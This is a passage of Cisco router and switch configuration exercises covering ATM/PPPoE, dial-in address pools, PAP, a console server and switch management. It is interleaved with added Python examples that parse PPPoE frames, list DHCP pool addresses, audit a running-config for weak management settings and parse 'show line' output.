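    for args in [("fred", "bert", "192.168.0.1", 0), ("fred", "bert", "192.168.0.2", 0),
                 ("test", None, "10.1.1.1", 1), ("test", None, "10.1.1.1", 2)]:
        print(args, admit(users, acls, *args))
```

Note that `nopassword` lets test in without any credential at all; the model makes that visible as a `Decision` with `allowed=True` and no password check, which is the behaviour an auditor would want to flag on a production device.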

Cisco Router Challenge 113


Outline
This challenge involves the configuration of security of a router.

Objectives
The objectives of this challenge are to:

Define Tacacs+.
Define accounting for start and stop events.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa account network default start-stop group tacacs+
(config)# aaa account reverse-access default group tacacs+

Cisco Router Challenge 114


Outline
This challenge involves the configuration of ATM.
Objectives
The objectives of this challenge are to:

Define E0.
Define ATM.
Define bridge protocol.

Example
> enable
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# bridge-group 1
(config-if)# exit
(config)# int atm0
(config-if)# mac-address 1111.2222.3333
(config-if)# dsl operating-mode auto
(config-if)# bridge-group 1
(config-if)# pvc 8/35
(config-if-atm-vc)# encapsulation aal5snap
(config-if-atm-vc)# exit
(config-if)# exit
(config)# bridge 1 protocol ieee

Explanation
In this case a bridge is created between the E0 and the ATM0 port. The encapsulation is
aal5snap (AAL5 Link Control/Subnet Access Protocol) which supports multiple protocols
over the same PVC.

Cisco Router Challenge 115


Outline
This challenge involves the configuration of ATM with a dialer interface and to encapsulate
PPP within an Ethernet environment.
Objectives
The objectives of this challenge are to:

Define a dialer
Define ATM.

Example
> enable
# config t
(config)# int atm0
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-atm-vc)# pppoe-client dial-pool-number 1
(config-atm-vc)# exit
(config-if)# exit
(config)# int dialer0
(config-if)# ip address negotiated
(config-if)# encapsulation ppp
(config-if)# dialer pool 1
(config-if)# ip mtu 1492
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1

Explanation
PPPoE encapsulates PPP within an Ethernet frame.
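The one-line explanation is the whole point of the `ip mtu 1492` setting in the dialer configuration: a PPPoE session frame carries an Ethernet header, a 6-byte PPPoE header and a 2-byte PPP protocol field before the IP packet, so 1500 - 6 - 2 = 1492 bytes remain. The following builder/parser is an added example (not from NetworkSims); the MAC addresses and payload in the test are constructed, and the field layout follows RFC 2516.

```python
import struct

ETHERTYPE_PPPOE_SESSION = 0x8864   # PPPoE session stage (RFC 2516)
PPPOE_VER_TYPE = 0x11              # version 1, type 1, packed in one byte
PPPOE_CODE_SESSION = 0x00          # session data (discovery uses other codes)
PPP_PROTO_IPV4 = 0x0021
ETH_HEADER_LEN = 14
PPPOE_HEADER_LEN = 6               # ver/type, code, session id, length
PPP_PROTO_LEN = 2

def build_session_frame(dst_mac: bytes, src_mac: bytes, session_id: int,
                        ppp_protocol: int, payload: bytes) -> bytes:
    """Ethernet header + PPPoE session header + PPP protocol field + payload."""
    ppp = struct.pack("!H", ppp_protocol) + payload
    pppoe = struct.pack("!BBHH", PPPOE_VER_TYPE, PPPOE_CODE_SESSION, session_id, len(ppp))
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_PPPOE_SESSION) + pppoe + ppp

def parse_session_frame(frame: bytes) -> dict:
    """Strip the layers again, validating each field before trusting it."""
    if len(frame) < ETH_HEADER_LEN + PPPOE_HEADER_LEN + PPP_PROTO_LEN:
        raise ValueError("frame too short for Ethernet+PPPoE+PPP headers")
    dst, src = frame[:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_PPPOE_SESSION:
        raise ValueError(f"not a PPPoE session frame: ethertype 0x{ethertype:04x}")
    ver_type, code, session_id, length = struct.unpack("!BBHH", frame[14:20])
    if ver_type != PPPOE_VER_TYPE or code != PPPOE_CODE_SESSION:
        raise ValueError("unexpected PPPoE version/type/code")
    body = frame[20:20 + length]
    if len(body) != length:       # truncated frame or a length field that lies
        raise ValueError("PPPoE length field exceeds frame")
    ppp_protocol = struct.unpack("!H", body[:2])[0]
    return {"dst": dst, "src": src, "session_id": session_id,
            "ppp_protocol": ppp_protocol, "payload": body[2:]}

def is_well_formed(frame: bytes) -> bool:
    try:
        parse_session_frame(frame)
        return True
    except ValueError:
        return False

def max_ip_mtu(ethernet_mtu: int = 1500) -> int:
    """Largest IP packet that fits: Ethernet payload minus PPPoE and PPP overhead."""
    return ethernet_mtu - PPPOE_HEADER_LEN - PPP_PROTO_LEN   # 1500 - 6 - 2 = 1492

if __name__ == "__main__":
    # constructed addresses and a 20-byte IPv4-looking stub, purely for illustration
    frame = build_session_frame(bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"),
                                0x0042, PPP_PROTO_IPV4, bytes([0x45]) + bytes(19))
    print(parse_session_frame(frame)["ppp_protocol"] == PPP_PROTO_IPV4, max_ip_mtu())
```

The length check matters on the receiving side: a PPPoE length field larger than the remaining frame is the classic input a sloppy parser reads past, so the parser refuses it rather than returning a short payload.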

Cisco Router Challenge 116


Outline
This challenge involves the configuration of PPPoA with NAT.
Objectives
The objectives of this challenge are to:

Define a dialer.
Define ATM.

Example
> enable
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# exit
(config)# int atm0
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-atm-vc)# encapsulation aal5mux ppp dialer
(config-atm-vc)# dialer pool member 1
(config-atm-vc)# exit
(config-if)# exit
(config)# int dialer0
(config-if)# ip address negotiated
(config-if)# encapsulation ppp
(config-if)# dialer pool 1
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1
(config-if)# exit
(config)# ip nat inside source list 10 interface dialer0 overload
(config)# access-list 10 permit 10.0.0.0 0.0.0.255
(config)# ip route 0.0.0.0 0.0.0.0 dialer0

Explanation
PPPoA encapsulates PPP within ATM cells.

Cisco Router Challenge 117


Outline
This challenge involves the configuration of ATM for VPDN.
Objectives
The objectives of this challenge are to:

Define a dialer
Define ATM.

Example
> enable
# config t
(config)# vpdn enable
(config)# vpdn-group test
(config-vpdn)# request-dialin
(config-vpdn-req-in)# protocol pppoe
(config-vpdn-req-in)# exit
(config-vpdn)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# exit
(config)# int atm0
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-atm-vc)# pppoe-client dial-pool-number 1
(config-atm-vc)# exit
(config-if)# exit
(config)# int dialer0
(config-if)# ip address negotiated
(config-if)# encapsulation ppp
(config-if)# dialer pool 1
(config-if)# ip mtu 1492
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1

Cisco Router Challenge 118


Outline
This challenge involves the configuration of interactive PPP sessions.
Objectives
The objectives of this challenge are to:

Define async parameters.


Define line parameters.

Example
> enable
# config t
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# async ?
  default  Specify default parameters
  dynamic  Specify parameters which user may change
  mode     Specify line mode (interactive or dedicated interface use)
(config-if)# async mode ?
  dedicated    Line is dedicated as an async interface
  interactive  Line may be switched between interactive use and async interface
(config-if)# async mode interactive
(config-if)# exit
(config)# line 1
(config-line)# autoselect ?
  arap          Set line to allow ARAP autoselection
  during-login  Do autoselect at the Username/Password prompt
  ppp           Set line to allow PPP autoselection
  slip          Set line to allow SLIP autoselection
  timeout       Set wait timeout for initial autoselect byte
  <cr>
(config-line)# autoselect ppp
(config-line)# autoselect during-login

Cisco Router Challenge 119


Outline
This challenge involves the configuration of interface addressing method for local devices.

Objectives
The objectives of this challenge are to:

Define async parameters.


Define loopback parameters.

Example
> enable
# config t
(config)# int loopback1
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# exit
(config)# int async 6
(config-if)# ip unnumbered loopback1

Cisco Router Challenge 120


Outline
This challenge involves the configuration of a specific address for the dial-in host.
Objectives
The objectives of this challenge are to:

Define async parameters.


Define the peer address.

Example
> enable
# config t
(config)# int async 6
(config-if)# peer default ip address 192.168.1.1

Explanation
In this example the access-server uses the Async 6 port for an asynchronous connection.
Once it has connected it assigns the connected host the IP address 192.168.1.1 (Figure 1).

[Figure 1: a host dials in over the PSTN to Async 6 of the access server, which is configured with "int async 6" and "peer default ip address 192.168.1.1"; the host is assigned the address 192.168.1.1.]

Figure 1: Host assigned a fixed IP address

Cisco Router Challenge 121


Outline
This challenge involves the configuration of the allocation of the address for the dial-in host
using a local pool.
Objectives
The objectives of this challenge are to:

Define async parameters.


Define local pool of address for remote host.

Example
> enable
# config t
(config)# int async 6
(config-if)# peer default ip address pool testing
(config)# ip local pool testing 10.0.0.1 10.0.0.10

Explanation
In this example the access-server uses the Async 6 port for an asynchronous connection.
Once it has connected it assigns the connected host an IP address from the pool of
addresses from 10.0.0.1 to 10.0.0.10 (see Figure 1).

[Figure 1: a host dials in over the PSTN to Async 6 of the access server, which is configured with "int async 6", "peer default ip address pool testing" and "ip local pool testing 10.0.0.1 10.0.0.10"; the host is assigned an address from the pool 10.0.0.1 to 10.0.0.10.]

Figure 1: Host assigned an address from the local pool

Cisco Router Challenge 122


Outline
This challenge involves the configuration of DHCP address allocation for the dial-in host
using a DHCP pool.
Objectives
The objectives of this challenge are to:

Define async parameters.


Define the peer address.
Define a DHCP pool.

Example
> enable
# config t
(config)# int async 6
(config-if)# peer default ip address dhcp-pool wyoming
(config)# ip dhcp pool wyoming
(config-dhcp)# network 249.189.108.0 255.255.255.254
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
  conflict                   DHCP address conflict parameters
  database                   Configure DHCP database agents
  excluded-address           Prevent DHCP from assigning certain addresses
  limited-broadcast-address  Use all 1's broadcast address
  ping                       Specify ping parameters used by DHCP
  pool                       Configure DHCP address pools
  relay                      DHCP relay agent parameters
  smart-relay                Enable Smart Relay feature
(config)#ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
  packets  Specify number of ping packets
  timeout  Specify ping timeout
(config)# ip dhcp ping timeout 350

Explanation
In this example the access-server uses the Async 6 port for an asynchronous connection.
Once it has connected it assigns the connected host an IP address taken from the DHCP
pool (Figure 1).

[Figure 1: a host dials in over the PSTN to Async 6 of the access server, which is configured with "int async 6", "peer default ip address dhcp-pool wyoming", "ip dhcp pool wyoming" (network 249.189.108.0 255.255.255.0, dns-server 249.189.108.58, netbios-name-server 249.189.108.61, lease 3, default-router 249.189.108.87), "ip dhcp excluded-address 249.189.108.26" and "ip dhcp ping timeout 350"; the host is assigned an address from the DHCP pool.]

Figure 1: Host assigned an address from the DHCP server pool
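Both the local-pool challenge and this DHCP-pool challenge define a range of addresses the access server may hand out, and a practitioner usually wants to know exactly which addresses those are after exclusions. The code below is an added example, not NetworkSims material: it parses `ip local pool`, `ip dhcp pool` with its `network`/`default-router`/`dns-server`/`netbios-name-server` sub-commands, and `ip dhcp excluded-address`, then lists the assignable addresses and flags infrastructure addresses inside the network that were never excluded (IOS does not exclude the default-router or DNS server automatically). The fixture uses the 255.255.255.0 mask shown in Figure 1 rather than the 255.255.255.254 of the example command, since a /31 leaves only two addresses to hand out.

```python
import ipaddress

def parse_pools(config: str) -> dict:
    """Return {"local": {name: [addresses]}, "dhcp": {name: {...}}, "excluded": [addresses]}."""
    local, dhcp, excluded = {}, {}, []
    current = None                      # the DHCP pool whose sub-commands follow
    for raw in config.splitlines():
        t = raw.split()
        if not t:
            continue
        if t[:3] == ["ip", "local", "pool"]:
            start, end = ipaddress.ip_address(t[4]), ipaddress.ip_address(t[5])
            local[t[3]] = [ipaddress.ip_address(i) for i in range(int(start), int(end) + 1)]
            current = None
        elif t[:3] == ["ip", "dhcp", "pool"]:
            current = dhcp.setdefault(t[3], {"network": None, "servers": {}})
        elif t[:3] == ["ip", "dhcp", "excluded-address"]:
            excluded.append(ipaddress.ip_address(t[3]))
            current = None
        elif current is not None and t[0] == "network":
            current["network"] = ipaddress.ip_network(f"{t[1]}/{t[2]}", strict=False)
        elif current is not None and t[0] in ("default-router", "dns-server", "netbios-name-server"):
            current["servers"][t[0]] = [ipaddress.ip_address(a) for a in t[1:]]
        elif t[0] in ("!", "exit"):
            current = None
    return {"local": local, "dhcp": dhcp, "excluded": excluded}

def assignable(net: ipaddress.IPv4Network) -> list:
    """Addresses a DHCP server may hand out: the block minus its network and
    broadcast addresses (a /31 or /32 has none to remove)."""
    if net.prefixlen >= 31:
        return list(net)
    return list(net)[1:-1]

def dhcp_available(pool: dict, excluded: list) -> list:
    return [a for a in assignable(pool["network"]) if a not in excluded]

def unexcluded_infrastructure(pool: dict, excluded: list) -> list:
    """Addresses the pool itself names (default-router, dns-server, ...) that
    lie inside the network but were never excluded: the server could lease
    one of them to a client and create a duplicate-address conflict."""
    hits = []
    for role, addrs in pool["servers"].items():
        for a in addrs:
            if a in pool["network"] and a not in excluded:
                hits.append((role, str(a)))
    return hits

# Constructed fixture: the two challenges' pools in running-config form.
CONSTRUCTED_CONFIG = """
ip local pool testing 10.0.0.1 10.0.0.10
ip dhcp pool wyoming
 network 249.189.108.0 255.255.255.0
 dns-server 249.189.108.58
 netbios-name-server 249.189.108.61
 lease 3
 default-router 249.189.108.87
ip dhcp excluded-address 249.189.108.26
"""

if __name__ == "__main__":
    p = parse_pools(CONSTRUCTED_CONFIG)
    print("local pool testing:", len(p["local"]["testing"]), "addresses")
    print("dhcp pool wyoming:", len(dhcp_available(p["dhcp"]["wyoming"], p["excluded"])), "assignable")
    print("not excluded:", unexcluded_infrastructure(p["dhcp"]["wyoming"], p["excluded"]))
```

On the fixture the only excluded address is .26, so the default router (.87), DNS server (.58) and NetBIOS name server (.61) all remain leasable; the `ip dhcp ping` check configured in the challenge would catch a live conflict at lease time, but excluding those addresses up front is the reliable fix.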

Cisco Router Challenge 123


Outline
This challenge involves the configuration for PAP.
Objectives
The objectives of this challenge are to:

Define async parameters.

Define local address.


Define PAP details.

Example
> enable
# config t
(config)# hostname edinburgh
(config)# username newyork password test
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# dialer map ip 192.168.1.2 name newyork
(config-if)# ppp pap sent-username edinburgh password ttt

Explanation
In this example the username is set as the hostname of the remote device. Figure 1 shows an
example configuration for two devices, on which either can connect to the other.

[Figure 1: the two devices are connected over the PSTN through their Async 6 ports and are configured as follows.]

edinburgh:
> enable
# config t
(config)# hostname edinburgh
(config)# username newyork password test
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# dialer map ip 192.168.1.2 name newyork
(config-if)# ppp pap sent-username edinburgh password ttt

newyork:
> enable
# config t
(config)# hostname newyork
(config)# username edinburgh password ttt
(config)# int async 6
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# ip address 192.168.1.2 255.255.255.0
(config-if)# dialer map ip 192.168.1.1 name edinburgh
(config-if)# ppp pap sent-username newyork password test

Figure 1: PAP configuration for the two devices

Cisco Router Challenge 193


Outline
This challenge involves the configuration of a 2501 Console Server, which has multiple TTY
connections that connect to the console ports of devices. This allows for remote
connections. For example the first TTY connection can be connected to by:
telnet IP 2001
and the second by:
telnet IP 2002
Objectives
The objectives of this challenge are to:

Define the hostname.


Show connections.

Example
> enable
# config t
(config)# int loopback0
(config-if)# ip address 10.0.0.1 255.255.255.255
(config-if)# exit
(config)# int e0
(config-if)# ip address 192.168.1.100 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# line 1 16
(config-line)# tran input ?
  all     All protocols
  none    No protocols
  pad     X.3 PAD
  rlogin  Unix rlogin protocol
  telnet  TCP/IP Telnet protocol
  v120    Async over ISDN
(config-line)# transport input all
(config-line)# no ?
  absolute-timeout            Set absolute timeout for line disconnection
  access-class                Filter connections based on an IP access list
  activation-character        Define the activation character
  autobaud                    Set line to normal autobaud
  autocommand                 Automatically execute an EXEC command
  autocommand-options         Autocommand options
  autohangup                  Automatically hangup when last connection closes
  autoselect                  Set line to autoselect
  buffer-length               Set DMA buffer length
  data-character-bits         Size of characters being handled
  databits                    Set number of data bits per character
  disconnect-character        Define the disconnect character
  dispatch-character          Define the dispatch character
  dispatch-machine            Reference a TCP dispatch state machine
  dispatch-timeout            Set the dispatch timer
  domain-lookup               Enable domain lookups in show commands
  editing                     Enable command line editing
  escape-character            Change the current line's escape character
  exec                        Configure EXEC
  exec-banner                 Enable the display of the EXEC banner
  exec-character-bits         Size of characters to the command exec
  exec-timeout                Set the EXEC timeout
  flowcontrol                 Set the flow control
  flush-at-activation         Clear input stream at activation
  full-help                   Provide help to unprivileged user
  history                     Enable and control the command history function
  hold-character              Define the hold character
  insecure                    Mark line as 'insecure' for LAT
  international               Enable international 8-bit character support
  ip                          IP options
  length                      Set number of lines on a screen
  location                    Enter terminal location description
  lockable                    Allow users to lock a line
  logging                     Modify message logging facilities
  login                       Enable password checking
  logout-warning              Set Warning countdown for absolute timeout of line
  modem                       Configure the Modem Control Lines
  monitor                     Copy debug output to the current terminal line
  motd-banner                 Enable the display of the MOTD banner
  notify                      Inform users of output from concurrent sessions
  ntp                         Configure NTP
  padding                     Set padding for a specified output character
  parity                      Set terminal parity
  password                    Set a password
  private                     Configuration options that user can set will remain in effect between terminal sessions
  privilege                   Change privilege level for line
  refuse-message              Define a refuse banner
  rotary                      Add line to a rotary group
  rxspeed                     Set the receive speed
  script                      specify event related chat scripts to run on the line
  session-disconnect-warning  Set warning countdown for session-timeout
  session-limit               Set maximum number of sessions
  session-timeout             Set interval for closing connection when there is no input traffic
  special-character-bits      Size of the escape (and other special) characters
  speed                       Set the transmit and receive speeds
  start-character             Define the start character
  stop-character              Define the stop character
  stopbits                    Set async line stop bits
  telnet                      Telnet protocol-specific configuration
  terminal-type               Set the terminal type
  timeout                     Timeouts for the line
  transport                   Define transport protocols for line
  txspeed                     Set the transmit speeds
  vacant-message              Define a vacant banner
  width                       Set width of the display terminal
  x25                         X25 protocol-specific configuration
(config-line)# no exec
(config-line)# exit
(config)# exit

# sh version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-I-L), Version 12.0(2a), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Fri 01-Jan-99 14:38 by phanguye
Image text-base: 0x0302E1C0, data-base: 0x00001000
ROM: System Bootstrap, Version 11.0(10c)XB1, PLATFORM SPECIFIC RELEASE SOFTWARE (fc1)
BOOTFLASH: 3000 Bootstrap Software (IGS-BOOT-R), Version 11.0(10c)XB1, PLATFORM SPECIFIC
RELEASE SOFTWARE (fc1)
cons uptime is 32 minutes
System restarted by power-on
System image file is "flash:c2500-i-l.120-2a"
cisco AS2511-RJ (68030) processor (revision I) with 6144K/2048K bytes of memory.
Processor board ID 12933183, with hardware revision 00000000
Bridging software.
X.25 software, Version 3.0.0.
1 Ethernet/IEEE 802.3 interface(s)
1 Serial network interface(s)
16 terminal line(s)
32K bytes of non-volatile configuration memory.
8192K bytes of processor board System flash (Read ONLY)
Configuration register is 0x2102
# show running
Using 1157 out of 32762 bytes
!
version 12.0
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname cons
!
enable secret 5 $1$JoVG$/lz4ezMej5nRUUsTCFmvv1
enable password 7 110A15040401
!
ip subnet-zero
no ip routing
no ip domain-lookup
!
interface Loopback0
ip address 10.0.0.1 255.255.255.255
no ip directed-broadcast
!
interface Ethernet0
ip address 192.168.1.100 255.255.255.0
no ip directed-broadcast
no ip route-cache
no ip mroute-cache
!
interface Serial0
no ip address
no ip directed-broadcast
no ip route-cache
no ip mroute-cache
shutdown
!
ip default-gateway 192.168.1.254
ip classless
!
!
line con 0
password 7 14141C0A1C55
login
transport input none
line 1 16
no exec
exec-timeout 0 0
password 7 030752180500
login
transport input all
transport output telnet
line aux 0
line vty 0 4
password 7 045805071F70
login
!
end
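The running-config above is a useful specimen for a management-plane review: it keeps an `enable password 7` beside the `enable secret`, protects every line with a type 7 password, allows every transport protocol into the TTY lines, disables the idle timeout on them and has no `access-class` on the vty lines. The audit below is an added example, not NetworkSims material; it works on an excerpt of the page's own `show running` output (interface blocks trimmed) and, because the page's rendering lost the indentation, it delimits sections by `!` and by the `line`/`interface` headers rather than by leading spaces.

```python
import re

# Excerpt of the 'show running' output from the challenge above (interface
# blocks trimmed; indentation was lost in the page's rendering).
PAGE_CONFIG = """\
!
version 12.0
service password-encryption
!
hostname cons
!
enable secret 5 $1$JoVG$/lz4ezMej5nRUUsTCFmvv1
enable password 7 110A15040401
!
ip subnet-zero
no ip routing
no ip domain-lookup
!
interface Ethernet0
ip address 192.168.1.100 255.255.255.0
no ip directed-broadcast
!
ip default-gateway 192.168.1.254
ip classless
!
line con 0
password 7 14141C0A1C55
login
transport input none
line 1 16
no exec
exec-timeout 0 0
password 7 030752180500
login
transport input all
transport output telnet
line aux 0
line vty 0 4
password 7 045805071F70
login
!
end
"""

def parse_sections(config: str) -> list:
    """Split the config into (section, [lines]) pairs. With indentation gone,
    a section ends at '!' or at the next 'line'/'interface' header."""
    sections, current, lines = [], "global", []
    for raw in config.splitlines():
        line = raw.strip()
        if not line or line == "end":
            continue
        if line == "!" or line.startswith(("line ", "interface ")):
            if lines:
                sections.append((current, lines))
            current, lines = ("global" if line == "!" else line), []
            continue
        lines.append(line)
    if lines:
        sections.append((current, lines))
    return sections

def audit(config: str) -> list:
    """Defender's checklist for the console server's management plane.
    Returns (section, finding) pairs."""
    sections = parse_sections(config)
    findings = []
    global_lines = [l for s, ls in sections for l in ls if s == "global"]
    if "aaa new-model" not in global_lines:
        findings.append(("global", "aaa new-model absent: line passwords only, no per-user accountability"))
    if any(l.startswith("enable password") for l in global_lines):
        findings.append(("global", "enable password (type 7, reversible) kept beside enable secret; remove it"))
    for section, lines in sections:
        if not section.startswith("line"):
            continue
        if any(re.match(r"password 7 ", l) for l in lines):
            findings.append((section, "type 7 line password: service password-encryption only obfuscates it"))
        if "transport input all" in lines:
            findings.append((section, "transport input all: permit only the protocol the line needs"))
        if "exec-timeout 0 0" in lines:
            findings.append((section, "exec-timeout 0 0: idle sessions never time out"))
        if section.startswith("line vty") and not any(l.startswith("access-class") for l in lines):
            findings.append((section, "vty has no access-class: logins accepted from any source"))
    return findings

if __name__ == "__main__":
    for section, finding in audit(PAGE_CONFIG):
        print(f"{section:12} {finding}")
```

The `exec-timeout 0 0` finding on `line 1 16` is the one a console-server operator will usually accept deliberately (those lines carry reverse-telnet sessions with `no exec`), which is why the audit reports rather than scores: the list is input to a review, not a verdict.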
# sh line
   Tty Typ     Tx/Rx    A Modem  Roty AccO AccI   Uses   Noise  Overruns   Int
     0 CTY              -    -      -    -    -      0       0     0/0       -
     1 TTY   9600/9600  -    -      -    -    -      0      22     0/0       -
     2 TTY   9600/9600  -    -      -    -    -      0      62     0/0       -
*    3 TTY   9600/9600  -    -      -    -    -      0      20     0/0       -
     4 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
     5 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
     6 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
     7 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
     8 TTY   9600/9600  -    -      -    -    -      0       2     0/0       -
     9 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    10 TTY   9600/9600  -    -      -    -    -      0       2     0/0       -
    11 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    12 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    13 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    14 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    15 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    16 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    17 AUX   9600/9600  -    -      -    -    -      0       0     0/0       -
*   18 VTY              -    -      -    -    -      1       0     0/0       -
    19 VTY              -    -      -    -    -      0       0     0/0       -
    20 VTY              -    -      -    -    -      0       0     0/0       -
    21 VTY              -    -      -    -    -      0       0     0/0       -
    22 VTY              -    -      -    -    -      0       0     0/0       -
In this case there is a connection on TTY 3 and TTY 18.


# clear line 3
# sh line
   Tty Typ     Tx/Rx    A Modem  Roty AccO AccI   Uses
     0 CTY              -    -      -    -    -      0
     1 TTY   9600/9600  -    -      -    -    -      0
     2 TTY   9600/9600  -    -      -    -    -      0
     3 TTY   9600/9600  -    -      -    -    -      0
     4 TTY   9600/9600  -    -      -    -    -      0
     5 TTY   9600/9600  -    -      -    -    -      0
     6 TTY   9600/9600  -    -      -    -    -      0
     7 TTY   9600/9600  -    -      -    -    -      0
     8 TTY   9600/9600  -    -      -    -    -      0
     9 TTY   9600/9600  -    -      -    -    -      0
    10 TTY   9600/9600  -    -      -    -    -      0
    11 TTY   9600/9600  -    -      -    -    -      0
    12 TTY   9600/9600  -    -      -    -    -      0
    13 TTY   9600/9600  -    -      -    -    -      0
    14 TTY   9600/9600  -    -      -    -    -      0
    15 TTY   9600/9600  -    -      -    -    -      0
    16 TTY   9600/9600  -    -      -    -    -      0
    17 AUX   9600/9600  -    -      -    -    -      0
*   18 VTY              -    -      -    -    -      1
    19 VTY              -    -      -    -    -      0
    20 VTY              -    -      -    -    -      0
    21 VTY              -    -      -    -    -      0
    22 VTY              -    -      -    -    -      0
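Reading `show line` by eye works for one console server; for a rack of them the same check is better scripted. The following is an added example, not part of the NetworkSims text: it parses a constructed copy of the `sh line` output above (only the rows needed are kept), reports which lines have a session (the leading `*`), maps a TTY line to the reverse-telnet port the outline describes (2000 + line number), and separates busy TTYs (console ports that may hold an abandoned session) from busy VTYs (one of which is the operator's own login).

```python
import re

# Constructed copy of the 'sh line' output from the challenge, trimmed to the
# rows this example needs.
SHOW_LINE = """\
   Tty Typ     Tx/Rx    A Modem  Roty AccO AccI   Uses   Noise  Overruns   Int
     0 CTY              -    -      -    -    -      0       0     0/0       -
     1 TTY   9600/9600  -    -      -    -    -      0      22     0/0       -
     2 TTY   9600/9600  -    -      -    -    -      0      62     0/0       -
*    3 TTY   9600/9600  -    -      -    -    -      0      20     0/0       -
     4 TTY   9600/9600  -    -      -    -    -      0       0     0/0       -
    17 AUX   9600/9600  -    -      -    -    -      0       0     0/0       -
*   18 VTY              -    -      -    -    -      1       0     0/0       -
    19 VTY              -    -      -    -    -      0       0     0/0       -
"""

ROW_RE = re.compile(r"^(\*?)\s*(\d+)\s+(CTY|TTY|AUX|VTY)\b")

def parse_show_line(text: str) -> list:
    """[(line_number, type, in_use), ...] for each data row of 'show line'.
    A leading '*' marks a line that currently has a session."""
    rows = []
    for raw in text.splitlines():
        m = ROW_RE.match(raw)
        if m:
            rows.append((int(m.group(2)), m.group(3), m.group(1) == "*"))
    return rows

def active_lines(text: str) -> list:
    """Line numbers that currently have a session."""
    return [n for n, _, busy in parse_show_line(text) if busy]

def busy_tty_lines(text: str) -> list:
    """Busy TTY (console-port) lines: candidates for review and, once confirmed
    abandoned, for 'clear line <n>'. VTYs are left out because one of them is
    the operator's own session."""
    return [n for n, typ, busy in parse_show_line(text) if busy and typ == "TTY"]

def reverse_telnet_port(line_number: int) -> int:
    """Reverse telnet to a console-server TTY uses TCP 2000 + line number,
    matching 'telnet IP 2001' for the first TTY in the challenge outline."""
    return 2000 + line_number

def line_for_port(port: int) -> int:
    return port - 2000

if __name__ == "__main__":
    print("active:", active_lines(SHOW_LINE))
    for n in busy_tty_lines(SHOW_LINE):
        print(f"TTY {n} (port {reverse_telnet_port(n)}) has a session; review before 'clear line {n}'")
```

On the sample the active lines are 3 and 18, exactly what the explanation states, and only line 3 is a TTY, which matches the `clear line 3` that follows.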
CCNP BCMSN Part 1

Cisco Switch Challenge 1


Outline
This challenge involves the configuration of an IP address on a VLAN.
Objectives
The objectives of this challenge are to:

Setup the VLAN address.


Define a domain-name.
Define the default gateway.

Example
> en
# config t
(config)# int vlan 1
(config-if)# ip address ?
A.B.C.D IP address
(config-if)# ip address 148.183.229.5 ?
A.B.C.D IP subnet mask
(config-if)# ip address 148.183.229.5 255.255.248.0
(config-if)# exit
(config)# ip domain-name ?
WORD Default domain name
(config)# ip domain-name perthshire.cc
(config)# ip default-gateway ?
A.B.C.D IP address of default gateway
(config)# ip default-gateway 148.183.229.6

Cisco Switch Challenge 2


Outline
This challenge involves the configuration of the console password and to enable the HTTP
server.
Objectives
The objectives of this challenge are to:

Setup the console password.


Enable the HTTP server.
Define the HTTP port.
Define the name server.

Example
> en
# config t
(config)#lin con ?
  <0-0>  First Line number
(config)# line con 0
(config-line)# password ?
  0     Specifies an UNENCRYPTED password will follow
  7     Specifies a HIDDEN password will follow
  LINE  The UNENCRYPTED (cleartext) line password
(config-line)# password texas
(config-line)# exit
(config)# ip http ?
  access-class    Restrict access by access-class
  authentication  Set http authentication method
  path            Set base path for HTML
  port            HTTP port
  server          Enable HTTP server
(config)# ip http server
(config)# ip http port ?
  <0-65535>  HTTP port
(config)# ip http port 1024
(config)# cdp ?
  advertise-v2  CDP sends version-2 advertisements
  holdtime      Specify the holdtime (in sec) to be sent in packets
  timer         Specify the rate at which CDP packets are sent (in sec)
  run
(config)# cdp run
(config)# ip name-server 14.154.109.7

Cisco Switch Challenge 3


Outline
This challenge involves the configuration of the VTY server and SNMP settings.
Objectives
The objectives of this challenge are to:

Setup a password on the Telnet session.


Define a username and password.
Define SNMP parameters.

Example
# config t
(config)#line vty ?
  <0-15>  First Line number
(config)#line vty 0 ?
  <1-15>  Last Line number
  <cr>
(config)# line vty 0 15
(config-line)# login
(config-line)# password manchester
(config-line)# exit
(config)# username june ?
  access-class         Restrict access by access-class
